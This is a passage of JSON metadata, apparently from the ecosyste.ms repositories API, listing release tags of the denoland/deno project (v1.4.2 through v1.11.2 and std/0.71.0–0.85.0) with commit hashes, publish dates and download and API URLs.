ll,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","